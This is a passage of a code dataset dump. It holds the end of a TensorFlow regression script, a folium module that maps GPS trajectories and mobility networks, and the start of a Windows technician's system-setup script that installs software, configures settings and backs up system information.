target features (i.e., labels) from the economic data set.\r\n\r\n  Args:\r\n    california_housing_dataframe: A Pandas DataFrame expected to contain data\r\n      from the economic data set.\r\n  Returns:\r\n    A DataFrame that contains the target feature.\r\n  \"\"\"\r\n  output_targets = pd.DataFrame()\r\n  # Scale the target to be in units of thousands of index points.\r\n  output_targets[\"tw_Adj_Close\"] = (\r\n    ecnm_dataframe[\"tw_Adj_Close\"] / 1000.0)\r\n  return output_targets\r\n\r\ntraining_examples = preprocess_features(ecnm_dataframe.head(2000))\r\n#training_examples.describe()\r\n\r\ntraining_targets = preprocess_targets(ecnm_dataframe.head(2000))\r\n#training_targets.describe()\r\n\r\nvldlt = ecnm_dataframe.tail(3185)\r\nvldft = vldlt.head(2000)\r\nvalidation_examples = preprocess_features(vldft)\r\n#validation_examples.describe()\r\n\r\nvalidation_targets = preprocess_targets(vldft)\r\n#validation_targets.describe()\r\n\r\n\r\ndef my_input_fn(features, targets, batch_size=1, shuffle=True, num_epochs=None):\r\n    \"\"\"Builds an input function that feeds batches of (features, labels) to the model.\r\n  \r\n    Args:\r\n      features: pandas DataFrame of features\r\n      targets: pandas DataFrame of targets\r\n      batch_size: Size of batches to be passed to the model\r\n      shuffle: True or False. Whether to shuffle the data.\r\n      num_epochs: Number of epochs for which data should be repeated. None = repeat indefinitely\r\n    Returns:\r\n      Tuple of (features, labels) for next data batch\r\n    \"\"\"\r\n    \r\n    # Convert pandas data into a dict of np arrays.\r\n    features = {key:np.array(value) for key,value in dict(features).items()}                                             \r\n    \r\n    # Construct a dataset, and configure batching/repeating.\r\n    ds = Dataset.from_tensor_slices((features,targets)) # warning: 2GB limit\r\n    ds = ds.batch(batch_size).repeat(num_epochs)\r\n    \r\n    # Shuffle the data, if specified.\r\n    if shuffle:\r\n      ds = ds.shuffle(10000)\r\n    \r\n    # Return the next batch of data.\r\n    features, labels = ds.make_one_shot_iterator().get_next()\r\n    return features, labels\r\n\r\ndef construct_feature_columns(input_features):\r\n  \"\"\"Construct the TensorFlow Feature Columns.\r\n\r\n  Args:\r\n    input_features: The names of the numerical input features to use.\r\n  Returns:\r\n    A set of feature columns\r\n  \"\"\" \r\n  return set([tf.feature_column.numeric_column(my_feature)\r\n              for my_feature in input_features])\r\n  \r\ndef train_model(\r\n    learning_rate,\r\n    steps,\r\n    batch_size,\r\n    training_examples,\r\n    training_targets,\r\n    validation_examples,\r\n    validation_targets):\r\n  \"\"\"Trains a linear regression model of multiple features.\r\n  \r\n  In addition to training, this function also prints training progress information,\r\n  as well as a plot of the training and validation loss over time.\r\n  \r\n  Args:\r\n    learning_rate: A `float`, the learning rate.\r\n    steps: A non-zero `int`, the total number of training steps. 
A training step\r\n consists of a forward and backward pass using a single batch.\r\n batch_size: A non-zero `int`, the batch size.\r\n training_examples: A `DataFrame` containing one or more columns from\r\n `california_housing_dataframe` to use as input features for training.\r\n training_targets: A `DataFrame` containing exactly one column from\r\n `california_housing_dataframe` to use as target for training.\r\n validation_examples: A `DataFrame` containing one or more columns from\r\n `california_housing_dataframe` to use as input features for validation.\r\n validation_targets: A `DataFrame` containing exactly one column from\r\n `california_housing_dataframe` to use as target for validation.\r\n \r\n Returns:\r\n A `LinearRegressor` object trained on the training data.\r\n \"\"\"\r\n\r\n periods = 10\r\n steps_per_period = steps / periods\r\n \r\n # Create a linear regressor object.\r\n my_optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\r\n my_optimizer = tf.contrib.estimator.clip_gradients_by_norm(my_optimizer, 5.0)\r\n linear_regressor = tf.estimator.LinearRegressor(\r\n feature_columns=construct_feature_columns(training_examples),\r\n optimizer=my_optimizer\r\n )\r\n \r\n # Create input functions.\r\n training_input_fn = lambda: my_input_fn(\r\n training_examples, \r\n training_targets[\"tw_Adj_Close\"], \r\n batch_size=batch_size)\r\n predict_training_input_fn = lambda: my_input_fn(\r\n training_examples, \r\n training_targets[\"tw_Adj_Close\"], \r\n num_epochs=1, \r\n shuffle=False)\r\n predict_validation_input_fn = lambda: my_input_fn(\r\n validation_examples, validation_targets[\"tw_Adj_Close\"], \r\n num_epochs=1, \r\n shuffle=False)\r\n\r\n # Train the model, but do so inside a loop so that we can periodically assess\r\n # loss metrics.\r\n print(\"Training model...\")\r\n print(\"RMSE (on training data):\")\r\n training_rmse = []\r\n validation_rmse = []\r\n for period in range (0, periods):\r\n # Train the model, starting from the prior state.\r\n linear_regressor.train(\r\n input_fn=training_input_fn,\r\n steps=steps_per_period,\r\n )\r\n # Take a break and compute predictions.\r\n training_predictions = linear_regressor.predict(input_fn=predict_training_input_fn)\r\n training_predictions = np.array([item['predictions'][0] for item in training_predictions])\r\n \r\n validation_predictions = linear_regressor.predict(input_fn=predict_validation_input_fn)\r\n validation_predictions = np.array([item['predictions'][0] for item in validation_predictions])\r\n \r\n \r\n # Compute training and validation loss.\r\n training_root_mean_squared_error = math.sqrt(\r\n metrics.mean_squared_error(training_predictions, training_targets))\r\n validation_root_mean_squared_error = math.sqrt(\r\n metrics.mean_squared_error(validation_predictions, validation_targets))\r\n # Occasionally print the current loss.\r\n print(\" period %02d : %0.2f\" % (period, training_root_mean_squared_error))\r\n # Add the loss metrics from this period to our list.\r\n training_rmse.append(training_root_mean_squared_error)\r\n validation_rmse.append(validation_root_mean_squared_error)\r\n print(\"Model training finished.\")\r\n\r\n # Output a graph of loss metrics over periods.\r\n plt.ylabel(\"RMSE\")\r\n plt.xlabel(\"Periods\")\r\n plt.title(\"Root Mean Squared Error vs. 
Periods\")\r\n plt.tight_layout()\r\n plt.plot(training_rmse, label=\"training\")\r\n plt.plot(validation_rmse, label=\"validation\")\r\n plt.legend()\r\n\r\n return linear_regressor\r\n\r\nlinear_regressor = train_model(\r\n learning_rate=0.001,\r\n steps=1000,\r\n batch_size=1,\r\n training_examples=training_examples,\r\n training_targets=training_targets,\r\n validation_examples=validation_examples,\r\n validation_targets=validation_targets)\r\n\r\n","sub_path":"sleftry/ecnm_ml/ecnm_tf_validation (2).py","file_name":"ecnm_tf_validation (2).py","file_ext":"py","file_size_in_byte":8926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"136238894","text":"import bezier\nimport colormap\nimport webbrowser\nimport numpy as np\nimport pandas as pd\nimport colorlover as cl\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nimport folium\nfrom folium.plugins import HeatMap\n\nc_lat, c_lon = None, None\n\n\ndef visualize_points(filename, points, tiles='stamentoner', zoom_start=11):\n global c_lat, c_lon\n c_lat, c_lon = np.mean(points, axis=0)\n m = folium.Map(location=[c_lon, c_lat], tiles=tiles, zoom_start=zoom_start)\n HeatMap(np.c_[points[:, 1], points[:, 0]],\n min_opacity=0.5, max_zoom=15, max_val=1.0, radius=15, blur=15).add_to(m)\n title_html = \"\"\"<div style=\"position: fixed; \n top: 20px; left: 50px; width: 800px; height: 90px; \n z-index:9999; font-size:40px; font-weight:bold; color: #3175b7\">Raw GPS Points</div>\"\"\"\n m.get_root().html.add_child(folium.Element(title_html))\n m.save(filename)\n webbrowser.open('file://%s' % filename)\n\n\ndef visualize_trajectories(filename, trajectories, tiles='stamentoner', zoom_start=11):\n global c_lat, c_lon\n if c_lat is None:\n points = np.array([[traj.start_point()[1], traj.start_point()[0]] for traj in trajectories.values()])\n c_lat, c_lon = np.mean(points, axis=0)\n m = folium.Map(location=[c_lon, c_lat], tiles=tiles, zoom_start=zoom_start)\n\n for tid, traj in trajectories.items():\n folium.PolyLine([[p[1], p[0]] for p in traj.object]).add_to(m)\n title_html = \"\"\"<div style=\"position: fixed; \n top: 20px; left: 50px; width: 800px; height: 90px; \n z-index:9999; font-size:40px; font-weight:bold; color: #3175b7\">Reconstructed Trajectories</div>\"\"\"\n m.get_root().html.add_child(folium.Element(title_html))\n m.save(filename)\n webbrowser.open('file://%s' % filename)\n\n\ndef visualize_stops(filename, trajectories, tiles='stamentoner', zoom_start=11, radius=50):\n global c_lat, c_lon\n if c_lat is None:\n points = np.array([[traj.start_point()[1], traj.start_point()[0]] for traj in trajectories.values()])\n c_lat, c_lon = np.mean(points, axis=0)\n\n lat_list = list()\n lon_list = list()\n for tid, traj in trajectories.items():\n lat_list.append(traj.object[-1][1])\n lon_list.append(traj.object[-1][0])\n\n m = folium.Map(location=[c_lon, c_lat], tiles=tiles, zoom_start=zoom_start)\n for i in range(0, len(trajectories)):\n folium.Circle(location=(lat_list[i], lon_list[i]), radius=radius, fill=True, fill_opacity=0.8).add_to(m)\n title_html = \"\"\"<div style=\"position: fixed; \n top: 20px; left: 50px; width: 800px; height: 90px; \n z-index:9999; font-size:40px; font-weight:bold; color: #3175b7\">Stop Points</div>\"\"\"\n m.get_root().html.add_child(folium.Element(title_html))\n m.save(filename)\n webbrowser.open('file://%s' % filename)\n\n\ndef visualize_locations(filename, location_prototype, location_features, tiles='stamentoner', zoom_start=11,\n 
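my_input_fn in the record above follows the classic Estimator-era pattern: dict of NumPy arrays -> Dataset.from_tensor_slices -> batch/repeat/shuffle -> one-shot iterator. The pipeline construction in miniature (the iterator step is TF 1.x-only, so it is shown as a comment):

```python
import numpy as np
import tensorflow as tf

features = {"x": np.arange(8, dtype=np.float32)}
labels = np.arange(8, dtype=np.float32)
ds = tf.data.Dataset.from_tensor_slices((features, labels)).batch(4).repeat(1).shuffle(8)
# Under TF 1.x, as in the record:
#   feats, labs = ds.make_one_shot_iterator().get_next()
# and the tensors are then evaluated inside a tf.Session.
```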
q=np.array([0.0, 0.25, 0.50, 0.75, 1.0])):\n global c_lat, c_lon\n if c_lat is None:\n points = np.array([[p[1], p[0]] for p in location_prototype.values()])\n c_lat, c_lon = np.mean(points, axis=0)\n\n lat_list = list()\n lon_list = list()\n sup_list = list()\n for lid, p in location_prototype.items():\n lat_list.append(p[1])\n lon_list.append(p[0])\n sup_list.append(np.sqrt(location_features[lid]['loc_support'] * 10000))\n\n sup_colors = pd.qcut(sup_list, q=q, duplicates='drop')\n colors = list(cl.scales['9']['seq']['Blues'])[9 - len(sup_colors.categories):]\n sup_colors = pd.qcut(sup_list, q=q, labels=colors, duplicates='drop')\n\n m = folium.Map(location=[c_lon, c_lat], tiles=tiles, zoom_start=zoom_start)\n for i in range(0, len(location_prototype)):\n folium.Circle(\n location=(lat_list[i], lon_list[i]),\n radius=sup_list[i],\n color=sup_colors[i],\n fill=True,\n fill_color=sup_colors[i],\n fill_opacity=0.8\n ).add_to(m)\n title_html = \"\"\"<div style=\"position: fixed; \n top: 20px; left: 50px; width: 800px; height: 90px; \n z-index:9999; font-size:40px; font-weight:bold; color: #3175b7\">Detected Locations</div>\"\"\"\n m.get_root().html.add_child(folium.Element(title_html))\n m.save(filename)\n webbrowser.open('file://%s' % filename)\n\n\ndef get_bearing(p1, p2):\n '''\n Returns compass bearing from p1 to p2\n\n Parameters\n p1 : namedtuple with lat lon\n p2 : namedtuple with lat lon\n\n Return\n compass bearing of type float\n\n Notes\n Based on https://gist.github.com/jeromer/2005586\n '''\n\n long_diff = np.radians(p2[0] - p1[0])\n\n lat1 = np.radians(p1[1])\n lat2 = np.radians(p2[1])\n\n x = np.sin(long_diff) * np.cos(lat2)\n y = (np.cos(lat1) * np.sin(lat2)\n - (np.sin(lat1) * np.cos(lat2)\n * np.cos(long_diff)))\n bearing = np.degrees(np.arctan2(x, y))\n\n # adjusting for compass bearing\n if bearing < 0:\n return bearing + 360\n return bearing\n\n\ndef visualize_imn(filename, location_nextlocs, location_prototype, location_features,\n tiles='stamentoner', zoom_start=11, q=np.array([0.0, 0.25, 0.50, 0.75, 1.0])):\n global c_lat, c_lon\n if c_lat is None:\n points = np.array([[p[1], p[0]] for p in location_prototype.values()])\n c_lat, c_lon = np.mean(points, axis=0)\n\n fmov = list()\n weight = list()\n for lid1 in location_nextlocs:\n for lid2 in location_nextlocs[lid1]:\n s = location_prototype[lid1]\n e = location_prototype[lid2]\n gap = 0.05 * abs(e[1] - s[1]) / 0.05\n nodes = np.asfortranarray([\n [s[1], (s[1] + e[1]) / 2 + np.random.choice([gap, -gap]), e[1]],\n [s[0], (s[0] + e[0]) / 2 + np.random.choice([gap, -gap]), e[0]],\n ])\n curve = bezier.Curve(nodes, degree=2)\n val = curve.evaluate_multi(np.linspace(0.0, 1.0, 10))\n x_val = val[0]\n y_val = val[1]\n mov = list()\n for xv, yv in zip(x_val, y_val):\n mov.append([xv, yv])\n\n fmov.append(mov)\n weight.append(np.log(location_nextlocs[lid1][lid2] * 10))\n\n sup_colors = pd.qcut(weight, q=q, duplicates='drop')\n colors = list(cl.scales['9']['seq']['Greens'])[9 - len(sup_colors.categories):]\n sup_colors = pd.qcut(weight, q=q, labels=colors, duplicates='drop')\n\n m = folium.Map(location=[c_lon, c_lat], tiles=tiles, zoom_start=zoom_start)\n for i, fm in enumerate(fmov):\n folium.PolyLine(fm, color=sup_colors[i], weight=weight[i], opacity=0.8).add_to(m)\n s, e = fm[0], fm[-2]\n rotation = get_bearing(s, e) - 90\n folium.RegularPolygonMarker(location=e, color=sup_colors[i], fill=True, fill_color=sup_colors[i],\n fill_opacity=0.8, number_of_sides=3, radius=6, rotation=rotation).add_to(m)\n\n lat_list = list()\n 
lon_list = list()\n sup_list = list()\n for lid, p in location_prototype.items():\n lat_list.append(p[1])\n lon_list.append(p[0])\n sup_list.append(np.sqrt(location_features[lid]['loc_support'] * 10000))\n\n sup_colors = pd.qcut(sup_list, q=q, duplicates='drop')\n colors = list(cl.scales['9']['seq']['Blues'])[9 - len(sup_colors.categories):]\n sup_colors = pd.qcut(sup_list, q=q, labels=colors, duplicates='drop')\n\n for i in range(0, len(lon_list)):\n folium.Circle(location=(lat_list[i], lon_list[i]), radius=sup_list[i], color=sup_colors[i], fill=True,\n fill_color=sup_colors[i], fill_opacity=0.8).add_to(m)\n\n title_html = \"\"\"<div style=\"position: fixed; \n top: 20px; left: 50px; width: 800px; height: 90px; \n z-index:9999; font-size:40px; font-weight:bold; color: #3175b7\">Individual Mobility Network</div>\"\"\"\n m.get_root().html.add_child(folium.Element(title_html))\n\n m.save(filename)\n webbrowser.open('file://%s' % filename)\n\n\ndef cl2hex(c):\n r, g, b = c\n r, g, b = int(r), int(g), int(b)\n return colormap.rgb2hex(r, g, b)\n\n\ndef visualize_features(filename, user_features, df_train, features):\n features_map = dict()\n for ft, flist in features.items():\n for f in flist:\n features_map[f] = ft\n\n vals = list()\n names = list()\n mean_values = df_train.mean().to_dict()\n max_values = df_train.max().to_dict()\n min_values = df_train.min().to_dict()\n\n for f, v in user_features.items():\n if f in ['uid', 'crash']:\n continue\n if np.isnan(v) or np.isinf(v) or v == -1 or max_values[f] == min_values[f] or np.isinf(\n min_values[f]) or np.isinf(max_values[f]):\n vals.append(0)\n else:\n v1 = (v - min_values[f]) / (max_values[f] - min_values[f])\n v2 = (mean_values[f] - min_values[f]) / (max_values[f] - min_values[f])\n d = v1 - v2\n vals.append(d)\n names.append('%s-%s' % (features_map[f], f))\n\n gap = (max(vals) - min(vals)) / 6\n bins = np.arange(min(vals), max(vals), gap)\n color_scale = list(cl.to_numeric(cl.scales[str(len(bins) - 1)]['div']['RdYlGn']))\n color_scale = [cl2hex(c) for c in color_scale]\n colors = pd.cut(vals, bins=bins, labels=color_scale)\n colors = [c if not isinstance(c, float) else color_scale[3] for c in colors]\n\n fetures_per_plot = 20\n fig = plt.figure(figsize=(50, 40))\n fontsize = 13\n\n pid = 0\n for cid in range(0, 3):\n for rid in range(0, 7):\n plt.subplot(3, 7, pid + 1)\n ifrom = pid * fetures_per_plot\n ito = pid * fetures_per_plot + fetures_per_plot\n svals = vals[ifrom:ito]\n snames = names[ifrom:ito]\n scolors = colors[ifrom:ito]\n\n x = np.arange(len(svals))\n plt.barh(x, svals, color=scolors)\n for i, v, n in zip(x, svals, snames):\n if v < 0:\n plt.text(0.01, i, n, fontsize=fontsize)\n elif v > 0:\n plt.text(-0.01, i, n, horizontalalignment='right', fontsize=fontsize)\n elif v == 0:\n plt.text(0.01, i, n, horizontalalignment='center', fontsize=fontsize)\n plt.axvline(0, color='k')\n plt.axis('off')\n plt.xlim(min(vals), max(vals))\n pid += 1\n\n st = fig.suptitle('Final Features', fontsize=fontsize*10)\n fig.tight_layout()\n st.set_y(0.95)\n fig.subplots_adjust(top=0.85)\n plt.savefig(filename, format='png', bbox_inches='tight')\n plt.close()\n browser = webbrowser.get('chrome')\n browser.open('file://%s' % filename)\n\n\ndef visualize_crash_risk(filename, uid, area, period, crash_proba, path):\n odo_idx = int((1.0-crash_proba) * 6)\n img = mpimg.imread(path + 'fig/odometer/odometer_%s.png' % odo_idx)\n plt.imshow(img)\n plt.title('User %s - %s - %s - Crash Risk: %.2f' % (\n uid, area.capitalize(), period.capitalize(), crash_proba), 
fontsize=16)\n plt.axis('off')\n plt.savefig(filename, format='png', bbox_inches='tight')\n plt.close()\n browser = webbrowser.get('chrome')\n browser.open('file://%s' % filename)\n","sub_path":"code/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":11225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"102635675","text":"'''Wizard Kit: System Setup'''\n# pylint: disable=wildcard-import,wrong-import-position\n# vim: sts=2 sw=2 ts=2\n\nimport os\nimport sys\n\n# Init\nsys.path.append(os.path.dirname(os.path.realpath(__file__)))\nfrom collections import OrderedDict\nfrom functions.activation import *\nfrom functions.browsers import *\nfrom functions.cleanup import *\nfrom functions.info import *\nfrom functions.product_keys import *\nfrom functions.setup import *\nfrom functions.sw_diags import *\nfrom functions.windows_updates import *\ninit_global_vars()\nos.system('title {}: System Setup'.format(KIT_NAME_FULL))\nset_log_file('System Setup.log')\n\n\n# STATIC VARIABLES\n# pylint: disable=bad-whitespace,line-too-long\nOTHER_RESULTS = {\n 'Error': {\n 'BIOSKeyNotFoundError': 'BIOS KEY NOT FOUND',\n 'CalledProcessError': 'UNKNOWN ERROR',\n 'FileNotFoundError': 'FILE NOT FOUND',\n 'GenericError': 'UNKNOWN ERROR',\n 'Not4KAlignedError': 'FALSE',\n 'SecureBootDisabledError': 'DISABLED',\n 'WindowsUnsupportedError': 'UNSUPPORTED',\n },\n 'Warning': {\n 'GenericRepair': 'REPAIRED',\n 'NoProfilesError': 'NO PROFILES FOUND',\n 'NotInstalledError': 'NOT INSTALLED',\n 'OSInstalledLegacyError': 'OS INSTALLED LEGACY',\n 'SecureBootNotAvailError': 'NOT AVAILABLE',\n 'SecureBootUnknownError': 'UNKNOWN',\n 'UnsupportedOSError': 'UNSUPPORTED OS',\n 'WindowsOutdatedError': 'OUTDATED',\n },\n }\nSETUP_ACTIONS = OrderedDict({\n # Install software\n 'Installing Programs': {'Info': True},\n 'VCR': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': install_vcredists, 'Just run': True,},\n 'LibreOffice': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': install_libreoffice,\n 'If answer': 'LibreOffice', 'KWArgs': {'quickstart': False, 'register_mso_types': True, 'use_mso_formats': False, 'vcredist': False},\n },\n 'Ninite bundle': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': install_ninite_bundle, 'KWArgs': {'cs': 'STARTED'},},\n\n # Browsers\n 'Scanning for browsers': {'Info': True},\n 'Scan': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': scan_for_browsers, 'Just run': True, 'KWArgs': {'skip_ie': True},},\n 'Backing up browsers': {'Info': True},\n 'Backup browsers': {'New': False, 'Dat': True, 'Cur': True, 'HW': False, 'Function': backup_browsers, 'Just run': True,},\n\n # Install extensions\n 'Installing Extensions': {'Info': True},\n 'Classic Shell skin': {'New': True, 'Dat': True, 'Cur': False, 'HW': False, 'Function': install_classicstart_skin, 'Win10 only': True,},\n 'Chrome extensions': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': install_chrome_extensions,},\n 'Firefox extensions': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': install_firefox_extensions,},\n\n # Configure software'\n 'Configuring Programs': {'Info': True},\n 'Browser add-ons': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': install_adblock, 'Just run': True,\n 'Pause': 'Please enable uBlock Origin for all browsers',\n },\n 'Classic Start': {'New': True, 'Dat': True, 'Cur': False, 'HW': False, 'Function': config_classicstart, 
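visualize_imn above bends each edge into a quadratic Bézier by jittering the midpoint control node, which keeps opposite-direction edges visually distinct on the folium map. The curve construction on its own (requires the bezier package):

```python
import bezier
import numpy as np

s, e = (0.0, 0.0), (1.0, 1.0)
nodes = np.asfortranarray([
    [s[0], (s[0] + e[0]) / 2 + 0.05, e[0]],  # x: start, jittered mid, end
    [s[1], (s[1] + e[1]) / 2 - 0.05, e[1]],  # y: start, jittered mid, end
])
curve = bezier.Curve(nodes, degree=2)
points = curve.evaluate_multi(np.linspace(0.0, 1.0, 10))
print(points.shape)  # (2, 10): one row of x values, one of y values
```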
'Win10 only': True,},\n 'Config Windows Updates': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': config_windows_updates, 'Win10 only': True,},\n 'Enable Windows Updates': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': enable_windows_updates, 'KWArgs': {'silent': True},},\n 'Explorer (system)': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': config_explorer_system, 'Win10 only': True,},\n 'Explorer (user)': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': config_explorer_user, 'Win10 only': True,},\n 'Restart Explorer': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': restart_explorer,},\n 'Restore default UAC': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': restore_default_uac,},\n 'Update Clock': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': update_clock,},\n\n # Cleanup\n 'Cleaning up': {'Info': True},\n 'AdwCleaner': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': cleanup_adwcleaner,},\n 'Desktop': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': cleanup_desktop,},\n 'KIT_NAME_FULL': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': delete_empty_folders,},\n\n # System Info\n 'Exporting system info': {'Info': True},\n 'AIDA64 Report': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': run_aida64,},\n 'File listing': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': backup_file_list,},\n 'Power plans': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': backup_power_plans,},\n 'Product Keys': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': run_produkey,},\n 'Registry': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': backup_registry,},\n\n # Show Summary\n 'Summary': {'Info': True},\n 'Operating System': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': show_os_name, 'KWArgs': {'ns': 'UNKNOWN', 'silent_function': False},},\n 'Activation': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': show_os_activation, 'KWArgs': {'ns': 'UNKNOWN', 'silent_function': False},},\n 'BIOS Activation': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': activate_with_bios, 'If not activated': True,},\n 'Secure Boot': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': check_secure_boot_status, 'KWArgs': {'show_alert': False},},\n 'Installed RAM': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': show_installed_ram, 'KWArgs': {'ns': 'UNKNOWN', 'silent_function': False},},\n 'Temp size': {'New': False, 'Dat': False, 'Cur': True, 'HW': False, 'Function': show_temp_files_size, 'KWArgs': {'ns': 'UNKNOWN', 'silent_function': False},},\n 'Show free space': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': show_free_space, 'Just run': True,},\n 'Installed AV': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': get_installed_antivirus, 'KWArgs': {'ns': 'UNKNOWN', 'print_return': True},},\n 'Installed Office': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': get_installed_office, 'KWArgs': {'ns': 'UNKNOWN', 'print_return': True},},\n 'Partitions 4K aligned': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': check_4k_alignment, 'KWArgs': {'cs': 'TRUE', 'ns': 'FALSE'},},\n\n # Open things\n 'Opening Programs': {'Info': True},\n 'Device Manager': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': open_device_manager, 'KWArgs': {'cs': 'STARTED'},},\n 
'HWiNFO sensors': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': run_hwinfo_sensors, 'KWArgs': {'cs': 'STARTED'},},\n 'Speed test': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': open_speedtest, 'KWArgs': {'cs': 'STARTED'},},\n 'Windows Updates': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': open_windows_updates, 'KWArgs': {'cs': 'STARTED'},},\n 'Windows Activation': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': open_windows_activation, 'If not activated': True, 'KWArgs': {'cs': 'STARTED'},},\n 'Sleep': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': sleep, 'Just run': True, 'KWArgs': {'seconds': 3},},\n 'XMPlay': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': run_xmplay, 'KWArgs': {'cs': 'STARTED'},},\n })\nSETUP_ACTION_KEYS = (\n 'Function',\n 'If not activated',\n 'Info',\n 'Just run',\n 'KWArgs',\n 'Pause',\n )\nSETUP_QUESTIONS = {\n # AV\n 'MSE': {'New': None, 'Dat': None, 'Cur': None, 'HW': False, 'Ninite': True},\n\n # LibreOffice\n 'LibreOffice': {'New': None, 'Dat': None, 'Cur': None, 'HW': False, 'Ninite': True},\n\n # Ninite\n 'Base': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Ninite': True},\n 'Missing': {'New': False, 'Dat': True, 'Cur': False, 'HW': False, 'Ninite': True},\n 'Standard': {'New': True, 'Dat': True, 'Cur': False, 'HW': False, 'Ninite': True},\n }\n# pylint: enable=bad-whitespace,line-too-long\n\n\n# Functions\ndef check_os_and_abort():\n \"\"\"Check OS and prompt to abort if not supported.\"\"\"\n result = try_and_print(\n message='OS support status...',\n function=check_os_support_status,\n cs='GOOD',\n )\n if not result['CS'] and 'Unsupported' in result['Error']:\n print_warning('OS version not supported by this script')\n if not ask('Continue anyway? 
(NOT RECOMMENDED)'):\n abort()\n\n\ndef get_actions(setup_mode, answers):\n \"\"\"Get actions to perform based on setup_mode, returns OrderedDict.\"\"\"\n actions = OrderedDict({})\n for _key, _val in SETUP_ACTIONS.items():\n _action = {}\n _if_answer = _val.get('If answer', False)\n _win10_only = _val.get('Win10 only', False)\n\n # Set enabled status\n _enabled = _val.get(setup_mode, False)\n if _if_answer:\n _enabled = _enabled and answers[_if_answer]\n if _win10_only:\n _enabled = _enabled and global_vars['OS']['Version'] == '10'\n _action['Enabled'] = _enabled\n\n # Set other keys\n for _sub_key in SETUP_ACTION_KEYS:\n _action[_sub_key] = _val.get(_sub_key, None)\n\n # Fix KWArgs\n if _action.get('KWArgs', {}) is None:\n _action['KWArgs'] = {}\n\n # Handle \"special\" actions\n if _key == 'KIT_NAME_FULL':\n # Cleanup WK folders\n _key = KIT_NAME_FULL\n _action['KWArgs'] = {'folder_path': global_vars['ClientDir']}\n elif _key == 'Ninite bundle':\n # Add install_ninite_bundle() kwargs\n _action['KWArgs'].update({\n kw.lower(): kv for kw, kv in answers.items()\n if SETUP_QUESTIONS.get(kw, {}).get('Ninite', False)\n })\n elif _key == 'Explorer (user)':\n # Explorer settings (user)\n _action['KWArgs'] = {'setup_mode': setup_mode}\n\n # Add to dict\n actions[_key] = _action\n\n return actions\n\n\ndef get_answers(setup_mode):\n \"\"\"Get setup answers based on setup_mode and user input, returns dict.\"\"\"\n answers = {k: v.get(setup_mode, False) for k, v in SETUP_QUESTIONS.items()}\n\n # Answer setup questions as needed\n if answers['MSE'] is None and global_vars['OS']['Version'] == '7':\n answers.update(get_av_selection())\n\n if answers['LibreOffice'] is None:\n answers['LibreOffice'] = ask('Install LibreOffice?')\n\n return answers\n\n\ndef get_av_selection():\n \"\"\"Get AV selection.\"\"\"\n av_answers = {\n 'MSE': False,\n }\n av_options = [\n {\n 'Name': 'Microsoft Security Essentials',\n 'Disabled': global_vars['OS']['Version'] not in ['7'],\n },\n ]\n actions = [\n {'Name': 'None', 'Letter': 'N'},\n {'Name': 'Quit', 'Letter': 'Q'},\n ]\n\n # Show menu\n selection = menu_select(\n 'Please select an option to install',\n main_entries=av_options,\n action_entries=actions)\n if selection.isnumeric():\n index = int(selection) - 1\n if 'Microsoft' in av_options[index]['Name']:\n av_answers['MSE'] = True\n elif selection == 'Q':\n abort()\n\n return av_answers\n\n\ndef get_mode():\n \"\"\"Get mode via menu_select, returns str.\"\"\"\n setup_mode = None\n mode_options = [\n {'Name': 'New', 'Display Name': 'New / Clean install (no data)'},\n {'Name': 'Dat', 'Display Name': 'Clean install with data migration'},\n {'Name': 'Cur', 'Display Name': 'Original OS (post-repair or overinstall)'},\n {'Name': 'HW', 'Display Name': 'Hardware service (i.e. 
